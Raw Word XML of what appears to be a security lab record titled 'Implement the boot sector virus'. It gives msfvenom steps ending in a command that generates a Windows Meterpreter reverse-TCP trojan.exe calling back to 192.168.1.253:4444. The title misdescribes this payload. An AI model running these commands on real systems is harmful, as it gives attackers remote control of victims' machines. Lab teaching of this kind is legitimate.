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15109" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="009571F1">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1872" w:right="10863"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10280" w:type="dxa"/>
        <w:tblInd w:w="-898" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="954" w:type="dxa"/>
          <w:left w:w="898" w:type="dxa"/>
          <w:right w:w="843" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10280"/>
      </w:tblGrid>
      <w:tr w:rsidR="009571F1" w14:paraId="555FEFAF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="14916"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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5FCA794" w14:textId="749C627D" w:rsidR="009571F1" w:rsidRPr="00213340" w:rsidRDefault="00384B0F" w:rsidP="00213340">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="2042"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213340">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">IMPLEMENT THE BOOT SECTOR VIRUS </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38B5AFE8" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
            <w:pPr>
              <w:spacing w:after="10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D2A3AA3" w14:textId="77777777" w:rsidR="009571F1" w:rsidRPr="00213340" w:rsidRDefault="00384B0F">
            <w:pPr>
              <w:spacing w:after="107"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213340">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48185382" w14:textId="77777777" w:rsidR="009571F1" w:rsidRPr="00213340" w:rsidRDefault="00384B0F">
            <w:pPr>
              <w:spacing w:after="130"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213340">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t xml:space="preserve">AIM: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68488953" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="0"/>
                <w:tab w:val="center" w:pos="2120"/>
              </w:tabs>
              <w:spacing w:after="118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To implement boot sector virus.    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41C932F5" w14:textId="77777777" w:rsidR="009571F1" w:rsidRPr="00213340" w:rsidRDefault="00384B0F">
            <w:pPr>
              <w:spacing w:after="143"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213340">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t xml:space="preserve">PROCEDURE:            </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EB4B9DE" w14:textId="77777777" w:rsidR="009571F1" w:rsidRPr="00213340" w:rsidRDefault="00384B0F">
            <w:pPr>
              <w:spacing w:after="94"/>
              <w:ind w:left="677"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213340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 xml:space="preserve">Select Root Terminal   Emulator   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="564B63D2" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
            <w:pPr>
              <w:spacing w:after="10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Step 1: Update and Upgrade Kali Linux </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="254157E4" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
            <w:pPr>
              <w:spacing w:after="10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Open the terminal and type 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in :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sudo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apt-get update </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56D58F2F" w14:textId="2E7B38EB" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
            <w:pPr>
              <w:spacing w:after="117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Next, type in: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sudo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apt-get upgrade </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48434B3D" w14:textId="0E23B123" w:rsidR="00213340" w:rsidRDefault="00213340">
            <w:pPr>
              <w:spacing w:after="117"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1CBF51E8" w14:textId="77777777" w:rsidR="00213340" w:rsidRDefault="00213340" w:rsidP="00213340">
            <w:pPr>
              <w:spacing w:after="107" w:line="252" w:lineRule="auto"/>
              <w:ind w:right="45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Step 2: Open exploit software </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72B5F7F0" w14:textId="77777777" w:rsidR="00213340" w:rsidRDefault="00213340" w:rsidP="00213340">
            <w:pPr>
              <w:spacing w:after="174" w:line="250" w:lineRule="auto"/>
              <w:ind w:left="-5" w:right="187" w:hanging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Open up the terminal and type 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in :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msfvenom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0A4F3C0C" w14:textId="77777777" w:rsidR="00213340" w:rsidRDefault="00213340">
            <w:pPr>
              <w:spacing w:after="117"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="59E2D13E" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
            <w:pPr>
              <w:spacing w:after="15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Step 3: Fix any errors </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D822930" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
            <w:pPr>
              <w:spacing w:after="16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If you see this, it means that bundler is either set up incorrectly or hasn’t been updated. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35730555" w14:textId="77777777" w:rsidR="009571F1" w:rsidRPr="00213340" w:rsidRDefault="00384B0F">
            <w:pPr>
              <w:spacing w:after="174"/>
              <w:rPr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To fix this, change the current directory (file) to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usr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>/share/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metasploit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-framework by typing in: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18A06121" w14:textId="77777777" w:rsidR="009571F1" w:rsidRPr="00213340" w:rsidRDefault="00384B0F">
            <w:pPr>
              <w:spacing w:after="18" w:line="404" w:lineRule="auto"/>
              <w:ind w:right="2868"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213340">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t xml:space="preserve">      &gt;&gt; cd /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00213340">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00213340">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t>/share/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00213340">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t>metasploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00213340">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t>-framework/ from the root direct</w:t>
            </w:r>
            <w:r w:rsidRPr="00213340">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t xml:space="preserve">ory. If you make a mistake, you can type in </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BBADAE5" w14:textId="77777777" w:rsidR="009571F1" w:rsidRPr="00213340" w:rsidRDefault="00384B0F">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213340">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t xml:space="preserve">      &gt;&gt; cd</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00213340">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t xml:space="preserve"> ..</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00213340">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A6C6DF7" w14:textId="58AA4205" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
            <w:pPr>
              <w:spacing w:after="165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to go back to the previous directory or type in any directory after cd to go there. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16B39203" w14:textId="77777777" w:rsidR="00213340" w:rsidRDefault="00213340">
            <w:pPr>
              <w:spacing w:after="165"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1CC3705A" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
            <w:pPr>
              <w:spacing w:after="12" w:line="412" w:lineRule="auto"/>
              <w:ind w:right="266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3.Now that we are in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metasploit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>-framework directory, type in       &gt;&gt; gem install bundler to install bund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ler, then type in </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10B9FB73" w14:textId="01F5288D" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
            <w:pPr>
              <w:spacing w:after="155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     &gt;&gt; bundle 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install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35216A30" w14:textId="77777777" w:rsidR="00213340" w:rsidRDefault="00213340">
            <w:pPr>
              <w:spacing w:after="155"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="397840EF" w14:textId="18CCA941" w:rsidR="009571F1" w:rsidRPr="00213340" w:rsidRDefault="00384B0F" w:rsidP="00213340">
            <w:pPr>
              <w:spacing w:after="59" w:line="356" w:lineRule="auto"/>
              <w:ind w:right="63"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213340">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t xml:space="preserve">4.If bundler is not the correct version, you should get a message telling you which version to install (in this case it was 1.17.3). Type in       &gt;&gt; gem install </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00213340">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t>bundler:[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00213340">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t xml:space="preserve">version number] and then type in : gem update –system </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B5090D7" w14:textId="77777777" w:rsidR="00213340" w:rsidRDefault="00213340">
      <w:pPr>
        <w:spacing w:after="170" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="455" w:hanging="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F789E82" w14:textId="71364DB8" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="170" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="455" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: Choose our payload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A08B72B" w14:textId="77777777" w:rsidR="00213340" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="0" w:line="415" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="3146" w:hanging="1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To see a list of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>payloads :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msfvenom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-l payloads </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5877600E" w14:textId="77777777" w:rsidR="00213340" w:rsidRDefault="00213340">
      <w:pPr>
        <w:spacing w:after="0" w:line="415" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="3146" w:hanging="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4165A749" w14:textId="76ACD16C" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="0" w:line="415" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="3146" w:hanging="1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Step 5: Customize our </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">payload  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>msfvenom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</w:rPr>
        <w:t xml:space="preserve"> –list-options -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>reverse_tcp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EEB225B" w14:textId="77777777" w:rsidR="00213340" w:rsidRDefault="00213340">
      <w:pPr>
        <w:spacing w:after="0" w:line="415" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="3146" w:hanging="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73CF6EFD" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="174" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="187" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6: Generate the virus </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E1C715" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="174" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="187" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that we have our payload, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ip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address, and port number, we have all the information that we need.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9F757A" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="174" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="187" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Type in: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6AA51C" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="174" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="187" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Syntax: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594CEA34" w14:textId="77777777" w:rsidR="009571F1" w:rsidRPr="00213340" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="89" w:line="326" w:lineRule="auto"/>
        <w:ind w:right="825"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00213340">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00213340">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p [payload] LHOST</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00213340">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00213340">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00213340">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00213340">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> address] LPORT=[the port number] -f [file type] &gt; [path] Example </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C1AE38" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="170" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="455" w:hanging="10"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>msfvenom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-p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>reverse_tcp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LHOST=192.168.1.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>253</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  LPORT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=4444 -f exe  &gt; trojan.exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4598AB" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="193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FBCFDEA" w14:textId="77777777" w:rsidR="00213340" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="140" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="187" w:hanging="1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If we look in our files using ls, we see that our new file pops up.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFEE1EA" w14:textId="7D91DC4A" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="140" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="187" w:hanging="1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C2DA958" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="170" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="455" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">OUTPUT: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC67EEB" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="170" w:line="252" w:lineRule="auto"/>
        <w:ind w:right="455" w:hanging="260"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>msfvenom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FFFD138" w14:textId="6941D959" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="136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 w:rsidR="00322943">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A46B2EB" wp14:editId="6BD47DCE">
            <wp:extent cx="5709285" cy="269109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69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A0EA2" w14:textId="10E60159" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="98"/>
        <w:jc w:val="right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</w:p>
    <w:p w14:paraId="70E04D04" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="119" w:line="252" w:lineRule="auto"/>
        <w:ind w:right="455" w:hanging="260"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>msfvenom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-l payloads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7F78F6E" w14:textId="360BACC1" w:rsidR="009571F1" w:rsidRDefault="00384B0F" w:rsidP="00322943">
      <w:pPr>
        <w:spacing w:after="94"/>
        <w:ind w:right="12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 w:rsidR="00322943">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A9D6CE7" wp14:editId="68F3BD52">
            <wp:extent cx="5709285" cy="269109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69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66E44" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:spacing w:after="107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971BB96" w14:textId="1325B298" w:rsidR="009571F1" w:rsidRDefault="009571F1" w:rsidP="00322943">
      <w:pPr>
        <w:spacing w:after="95"/>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B364E58" w14:textId="77777777" w:rsidR="009571F1" w:rsidRDefault="00384B0F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D68728A" w14:textId="2841254C" w:rsidR="009571F1" w:rsidRPr="00322943" w:rsidRDefault="00384B0F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
